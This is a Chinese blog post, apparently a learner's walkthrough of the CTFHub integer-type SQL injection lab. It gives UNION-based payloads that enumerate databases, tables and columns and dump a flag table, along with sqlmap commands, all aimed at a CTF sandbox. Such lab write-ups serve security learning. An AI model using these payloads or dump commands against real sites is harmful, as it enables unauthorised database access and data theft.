CTFHUB-SQL注入-整数型注入(一)

最新推荐文章于 2024-08-14 08:00:00 发布
最新推荐文章于 2024-08-14 08:00:00 发布
阅读量2.2k 收藏 65
点赞数 48
分类专栏: CTFHUB技能树系列 文章标签: sql 数据库 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54201860/article/details/136381905
版权

前言

成长日记
CTFHUB技能树系列
进军SQL注入

什么是SQL注入:

后端SQL查询语句拼接了前端传递的参数,前端输入恶意的字符,打断了原有sql语句,实现了恶意的查询结果

快速判断是否有sql注入漏洞:

第一步:url中有id=1类似情况,尝试改变参数的值,看页面是否发生变化,如何发生变化 输入单双引号 是否出现报错sql语句 如果出现,证明很大可能有sql注入漏洞

sql注入的类型:

字符型和数字型

sql注入的手法/使用方式/常见的攻击方式:

  • 联合查询:这篇文章用的就是联合查询 union
  • 报错注入:

报错注入原理:基于mysql数据库管理软件函数的特性将想查询的数据通过报错语句回显到页面上。
报错注入的函数有哪些:
报错注入的特征:下面这句报错语句
image.png

  • 延时注入:(盲注)
  • 布尔注入:(盲注)

目前只了解了这么多

开启靶场

image.png
访问靶场环境http://challenge-415722ece4affd18.sandbox.ctfhub.com:10800
image.png
它让我们输入个1试一试,那就试一下
回显结果如下
image.png
再试试2
image.png
又试了一下3,发现没有结果
image.png

试一下1’没有结果查询失败
image.png

准备注入

id=-1 union select 1,database() 查询当前所在数据库
image.png
id=-1 union select 1,version() 查看数据库版本
image.png
id=-1 union select 1,group_concat(schema_name) from information_schema.schemata查询有哪些数据库
image.png
id=-1 union select 1,(select table_name from information_schema.tables where table_schema = “sqli” limit 0,1)查数据库sqli中有哪些表但是只显示第一个数据
image.png
id=-1 union select 1, group_concat(table_name) from information_schema.tables where table_schema = “sqli” )查数据库sqli中有哪些表
image.png
id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name = ‘flag’ 查询表flag中有哪些字段
image.png

获取flag

id=-1 union select 1,group_concat(flag) from sqli.flag 查询在数据库sqli中的flag表中的所有内容
image.png
提交即可完成

总结:

学的不够深入,理解的不够透彻,还是看了一些题解
还是需要多练多学多看
参考资料:https://www.cnblogs.com/0yst3r-2046/p/12469632.html

1.知识点

整数型注入

(1)检查是否存在注入

and 1=1 返回正确
and 1=2 返回错误

(2)猜字段数

order by x(x为数字)
得出字段数

(3)爆数据库名

?id=1 and 1=2 union select 1,database()
得到数据库名称sqli

(4)爆表名

?id=1 and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema=‘sqli’
得到表名 news,flag

(5)爆列名

?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘flag’
得到字段名flag

(6)爆字段内容(flag)

?id=1 and 1=2 union select 1,group_concat(flag) from sqli.flag

sqlmap工具方法:

python sqlmap.py -u http://challenge-09b258a06d2a3854.sandbox.ctfhub.com:10080/?id=1 --tables
 
python sqlmap.py -u http://challenge-09b258a06d2a3854.sandbox.ctfhub.com:10080/?id=1 -T flag --columns
 
python sqlmap.py -u http://challenge-09b258a06d2a3854.sandbox.ctfhub.com:10080/?id=1 -T flag -C flag --dump

这是参考文章里用的,自己用的话需要将url改成自己开启的靶场url

未完待续……

文档写的不够完善,后续会继续更新

鹤霄٩
关注
专栏目录
CTFHub——SQL注入
Aquarius_ego的博客
05-05 1725
CTFHub——SQL注入(报错注入、布尔盲注、时间盲注、MySQL结构、Cookie注入、UA注入、Refer注入、过滤空格)
CTFHUB-web-SQL注入
ookami6497的博客
11-29 818
CTFHUB SQL
CTFHUB - SQL注入-整数型和字符型注入
m0_64180167的博客
11-28 2373
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
CTFHub~SQL注入超简单详细教程
最新发布
weixin_67832625的博客
08-14 865
本文主要是对CTFHub靶场的SQL注入做了详细的教程讲解,让练习者对SQL注入有更详细的了解和深入,如有什么问题,随时联系作者
ctfhub SQL 整数型注入
qq_52671379的博客
06-21 354
SQL 整数型注入 题目 当输入值为1或2时有回显 当输入3时无回显 判断是否存在注入 加单引号 对应的id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,无回显。 作为sql注入的小白,我决定不采用大佬们的方法,看不懂,先分享自己的方法,非常传统。 由以上得知有两个字段,所以第一步,爆库名; '' union select 1,database() # 第二,爆表名; '' union select 1,group_concat(table_name) from information_
CTFHub-sql注入-整数型注入
qq_54537919的博客
07-22 913
CTFHub-sql注入-整数型注入
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1343
整型SQL注入
CTFHub | 整数型注入
尼泊罗河伯的博客
10-25 2582
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1237
CTFHUB-WEB-SQL注入
CTFHub_SQL整数型注入(超详解)
weixin_47443077的博客
07-26 1123
CTFHub_SQL整数型注入(超详解) 相信这个过程会帮助你理解sql注入! 首先打开环境 先尝试手注,已经说明是整数型,就直接查看字段数: -1 order by 1# -1 order by 2# -1 order by 3# 发现在第三步的时候没有回显,说明字段数是2。 接着判断显示位: -1 union select 1,2# 然后查看数据库: -1 union select database(),2# 接着获取sqli数据库中的表: -1 union select 1,grou
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5490
Ctfhub解题 web SQL注入
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1118
ctfhubSQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
ctfhub 整数型注入
plant1234的博客
06-16 1008
整数型注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata s
CTFHub - 整数型注入
Have_a_great_day的博客
09-07 634
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHub(SQL注入)
cxiaodi的博客
05-09 1297
CTFHubSQL注入专题)
CTFHubweb SQL注入
2301_81105268的博客
04-18 1226
id=1这个语句在数据库中返回几列,也就是SELECT * FROM uers WHERE id=1 and 1=2 LIMIT 1,0这个语句的数据结果集有几列,然后才可以用union进行联合查询。(2)可以用concat()或concat_ws()或group_concat()—[见数据库连接语句]----使得在sql注入时快速获得数据库的相关信息。使用order by语句进行测试:1 order by 1、1 order by 2等,直到报错为止,报错的前一个数,为字段数。
CTFHUB-整数型SQL注入
xixihahawuwu的博客
12-24 4495
CTFHUB-整数型SQL注入 根据提示输入1后发现页面回显并且url改变。由题可知此题为整数型注入 使用order by语句查询字段数 参数为3时不回显,说明字段数为2 使用union联合查询检测信息回显位置 id=1 union select 1,2 由于页面只允许返回一行内容,所以我们修改参数1为-1,使需要查询的信息回返 id=-1 union select 1,2 id=-1 union select 1,database() 获取当前数据库名 id=-1 union select 1,
CTFHub-SQL注入
yuqie的博客
06-13 1086
当传入的ID参数为and 1=2时,由于1=2不成立,所以返回假,页面就会返回与id=1不同的结果。需要注意的是,当level默认为1的时候,默认不扫cookie的内容,必须是level大于等于2才能扫cookie里的内容,所以这里选用level 2.很明显,直接使用rand函数每次产生的数值不一样,但当我们提供了一个固定的随机数的种子0之后,每次产生的值都是相同的,这也可以称之为伪随机。配合上floor函数就可以产生确定的两个数,即0和1并且结合固定的随机种子0,它每次产生的随机数列都是相同的值。
CTFHUB-SQL注入
m_de_g的博客
08-11 5824
** CTFHUB-SQL注入 ** 一、SQl注入的基础 1.介绍SQL注入 SQL注入就是指WEB应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来是实现对数据库的任意操作。 一般情况下,开发人员可以使用动态SQL语句创建通用、灵活的应用。动态SQL语句是在执行过程中构造的,他根据不同的条件产生不同的SQL语句。当开发人员在运行过程中需要根据不同的查询标准决定提取什么字段(如select语句),或者根据不同的条件选择不同
SQL注入实战:sqli-labs实验详解
本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库信息的步骤。” SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意SQL代码来获取、修改、...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值